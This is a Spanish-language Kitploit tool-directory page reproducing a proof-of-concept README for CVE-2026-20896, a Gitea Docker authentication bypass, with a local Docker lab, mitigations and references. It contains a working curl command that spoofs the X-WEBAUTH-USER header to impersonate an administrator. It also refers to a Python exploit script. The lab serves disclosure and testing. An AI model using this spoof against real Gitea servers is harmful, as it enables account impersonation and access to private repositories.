Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-20896 — Laboratorio de prueba de concepto y scripts de Python/cURL que demuestran CVE-2026-20896, un bypass de autenticación en imágenes oficiales de Gitea Docker a través del encabezado X-WEBAUTH-USER. | Kitploit
Herramientas/GitHubGitHub/yym8538/cve-2026-20896
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAutenticaciónLabs y Práctica
GitHubyym8538/cve-2026-20896

CVE-2026-20896

Laboratorio de prueba de concepto y scripts de Python/cURL que demuestran CVE-2026-20896, un bypass de autenticación en imágenes oficiales de Gitea Docker a través del encabezado X-WEBAUTH-USER.

1hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

CVE-2026-20896: PoC de omisión de autenticación en la imagen Docker de Gitea

[!WARNING] Utiliza este PoC únicamente en un laboratorio local o contra un sistema para el que tengas autorización explícita de prueba.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

Descripción general

CVE-2026-20896 es una omisión de autenticación en las imágenes Docker oficiales de Gitea afectadas. Cuando la autenticación mediante proxy inverso está habilitada, la configuración REVERSE_PROXY_TRUSTED_PROXIES = * generada por la imagen permite que un cliente capaz de alcanzar el backend de Gitea suplante a un usuario existente a través de la cabecera X-WEBAUTH-USER.

El laboratorio crea un administrador llamado gitea-admin con una contraseña aleatoria y almacena CVE-2026-20896_AUTH_BYPASS_CONFIRMED en el repositorio privado gitea-admin/private-proof. Leer ese archivo sin conocer la contraseña aleatoria del administrador demuestra la omisión.

Versiones afectadas

CategoríaVersión
VulnerableImágenes Docker oficiales gitea/gitea ≤ 1.26.2
Primera parcheada1.26.3
Recomendada1.26.4 o posterior

La configuración vulnerable requiere que la autenticación mediante proxy inverso esté habilitada y que el backend de Gitea sea directamente accesible, o que un proxy ascendente conserve la cabecera de identidad proporcionada por el atacante. No se requiere un contenedor de proxy inverso para esta reproducción local.

Entorno

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Espera unos segundos a que Gitea y el repositorio privado de prueba se inicialicen.

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

La explotación exitosa devuelve CVE-2026-20896_AUTH_BYPASS_CONFIRMED.

Python

python poc.py http://127.0.0.1:3000

El script compara solicitudes no autenticadas, no administradoras y de administrador falsificadas e imprime VULNERABLE cuando se confirma la omisión de autorización. Requiere Python 3.10 o posterior y utiliza únicamente la biblioteca estándar.

Impacto

  • Suplantación de usuarios de Gitea conocidos o adivinables
  • Acceso no autorizado a repositorios privados y recursos de usuario
  • Acciones administrativas cuando se suplanta una cuenta de administrador

Mitigación

  • Actualiza a Gitea 1.26.3 o posterior; se recomienda 1.26.4 o posterior.
  • Restringe REVERSE_PROXY_TRUSTED_PROXIES a direcciones de proxy de confianza.
  • Impide el acceso directo al backend de Gitea y sobrescribe las cabeceras de identidad proporcionadas externamente.
  • Deshabilita la autenticación mediante proxy inverso cuando no sea necesaria.

Limpieza

docker stop cve-2026-20896-gitea-vuln

Referencias

  • Aviso de seguridad de Gitea GHSA-f75j-4cw6-rmx4
  • Anuncio de las versiones 1.26.3 y 1.26.4 de Gitea
  • PR de corrección de seguridad de Gitea #38151
Descargar herramienta